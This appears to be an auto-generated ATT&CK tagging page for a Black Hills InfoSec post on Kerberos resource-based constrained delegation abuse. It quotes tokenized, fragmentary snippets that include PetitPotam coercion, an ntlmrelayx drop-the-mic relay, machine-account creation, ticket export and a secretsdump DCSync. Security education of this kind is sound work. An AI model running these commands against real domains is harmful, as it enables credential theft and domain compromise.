TTPwire Vol. 1 · MITRE ATT&CK·Tagged

Black Hills InfoSec

Abusing Delegation with Impacket (Part 3): Resource-Based Constrained Delegation

BHIS · 2025-11-26

ATT&CK techniques detected

22 predictions
T1557.001 Name Resolution Poisoning and SMB Relay
79%
“and configure rbcd cve - 2019 - 1040 ( drop the mic ) bypasses smb signing. by effectively “ dropping the mic ” during smb authentication, vulnerable hosts still accept connections even if they ’ re being relayed by an attacker. this can be leveraged to pivot protocols, like coer…”
T1550.003 Pass the Ticket
72%
“' 5. export the ticket into memory export krb5ccname = administrator @ [ email protected ] 6. perform a dcsync against dc01 as administrator impacket - secretsdump - k dc01. secure. local 3. add a user spn and configure rbcd with genericwrite assume we ’ ve compromised the user d…”
T1558 Steal or Forge Kerberos Tickets
66%
“with known vulnerabilities, overly powerful permissions, or other external factors, it becomes far more valuable! references - https : / / shenaniganslabs. io / 2019 / 01 / 28 / wagging - the - dog. html # a - forwardable - result - https : / / www. thehacker. recipes / ad / move…”
T1550.003 Pass the Ticket
64%
“constrained delegation, but the resource itself controls which accounts can delegate to it. by default, a domain account can configure rbcd on themselves or any resource they control. this approach lets the service decide who may delegate to it instead of the domain. resource - b…”
T1550.003 Pass the Ticket
62%
“. 202 - - delegate - access - - remove - mic 3. force the second dc ( 10. 0. 1. 203 ) to authenticate to us ( 10. 0. 1. 13 ) python3 petitpotam. py - u ' user. one ' - p ' password1! ' - d ' insecure. local ' 10. 0. 1. 13 10. 0. 1. 203 4. if successful, ntlmrelayx will authentica…”
T1558 Steal or Forge Kerberos Tickets
57%
“abusing delegation with impacket ( part 3 ) : resource - based constrained delegation abusing delegation with impacket ( part 3 ) : resource - based constrained delegation hunter recently graduated with his master ’ s degree in cyber defense and has over two years of experience i…”
T1003.006 DCSync
56%
“_ / ' 6. export the ticket into memory export krb5ccname = administrator @ [ email protected ] 7. perform a dcsync against dc02 as administrator impacket - secretsdump - k dc02. insecure. local 7. ( cleanup ) : remove the added machine account ( can only be done with administrati…”
T1557.001 Name Resolution Poisoning and SMB Relay
56%
“level steps are : - compromise a user or machine in the domain. - identify a domain controller vulnerable to cve - 2019 - 1040. - coerce a second domain controller to authenticate to the attacker. - drop the mic and relay authentication to ldap on the vulnerable domain controller…”
T1558 Steal or Forge Kerberos Tickets
54%
“. io / s4fuckme2selfanduandu2proxy - a - low - dive - into - kerberos - delegations / - https : / / mayfly277. github. io / posts / goadv2 - pwning - part10 / - https : / / shenaniganslabs. io / 2019 / 01 / 28 / wagging - the - dog. html - https : / / www. tiraniddo. dev / 2022 /…”
T1558.001 Golden Ticket
47%
“collection all 2. add a new computer called machine $ using machine account quota impacket - addcomputer - computer - name ' machine $ ' - computer - pass ' machinepass! ' - dc - host 10. 0. 1. 200 ' secure. local / dacluser ' : ' password3 # ' 3. configure dc01 $ to trust machin…”
T1558.001 Golden Ticket
45%
“has the “ write all properties ” ( genericwrite ) permission over an active directory object, such user can configure resource based constrained delegation to trust any user / machine for delegation. to escalate in the domain, we can simply configure rbcd on dc01 $ to trust a mac…”
T1550.003 Pass the Ticket
45%
“abusing delegation with impacket ( part 3 ) : resource - based constrained delegation abusing delegation with impacket ( part 3 ) : resource - based constrained delegation hunter recently graduated with his master ’ s degree in cyber defense and has over two years of experience i…”
T1550.003 Pass the Ticket
44%
“with known vulnerabilities, overly powerful permissions, or other external factors, it becomes far more valuable! references - https : / / shenaniganslabs. io / 2019 / 01 / 28 / wagging - the - dog. html # a - forwardable - result - https : / / www. thehacker. recipes / ad / move…”
T1558 Steal or Forge Kerberos Tickets
44%
“' 5. export the ticket into memory export krb5ccname = administrator @ [ email protected ] 6. perform a dcsync against dc01 as administrator impacket - secretsdump - k dc01. secure. local 3. add a user spn and configure rbcd with genericwrite assume we ’ ve compromised the user d…”
T1558.001 Golden Ticket
43%
“compromise a user or machine with genericwrite permissions over an object. - add an spn to a compromised user if needed. - configure the affected object to trust the compromised user for delegation. - use s4u2self and s4u2proxy to obtain a service ticket as an elevated user to th…”
T1558 Steal or Forge Kerberos Tickets
42%
“compromise a user or machine with genericwrite permissions over an object. - add an spn to a compromised user if needed. - configure the affected object to trust the compromised user for delegation. - use s4u2self and s4u2proxy to obtain a service ticket as an elevated user to th…”
T1187 Forced Authentication
42%
“and configure rbcd cve - 2019 - 1040 ( drop the mic ) bypasses smb signing. by effectively “ dropping the mic ” during smb authentication, vulnerable hosts still accept connections even if they ’ re being relayed by an attacker. this can be leveraged to pivot protocols, like coer…”
T1098 Account Manipulation
38%
“_ / ' 6. export the ticket into memory export krb5ccname = administrator @ [ email protected ] 7. perform a dcsync against dc02 as administrator impacket - secretsdump - k dc02. insecure. local 7. ( cleanup ) : remove the added machine account ( can only be done with administrati…”
T1187 Forced Authentication
36%
“level steps are : - compromise a user or machine in the domain. - identify a domain controller vulnerable to cve - 2019 - 1040. - coerce a second domain controller to authenticate to the attacker. - drop the mic and relay authentication to ldap on the vulnerable domain controller…”
T1550.003 Pass the Ticket
34%
“’ t one already ( dacl. secure. local ) python3 addspn. py - u secure. local \ dacluser - p ' password3 # ' - s host / dacl. secure. local - - target - type samname 10. 0. 1. 200 3. using dacluser ’ s credentials, we can obtain a service ticket as the domain administrator to dc01…”
T1550.003 Pass the Ticket
33%
“collection all 2. add a new computer called machine $ using machine account quota impacket - addcomputer - computer - name ' machine $ ' - computer - pass ' machinepass! ' - dc - host 10. 0. 1. 200 ' secure. local / dacluser ' : ' password3 # ' 3. configure dc01 $ to trust machin…”
T1558 Steal or Forge Kerberos Tickets
32%
“has the “ write all properties ” ( genericwrite ) permission over an active directory object, such user can configure resource based constrained delegation to trust any user / machine for delegation. to escalate in the domain, we can simply configure rbcd on dc01 $ to trust a mac…”

Summary

This is the third in a three-part series of blog posts discussing how to abuse Kerberos delegation! If you haven't already, feel free to read the first blog post, which discusses the Kerberos authentication process, how delegation plays an important role in solving the double-hop problem, and how to abuse unconstrained delegation.

The post Abusing Delegation with Impacket (Part 3): Resource-Based Constrained Delegation appeared first on Black Hills Information Security, Inc.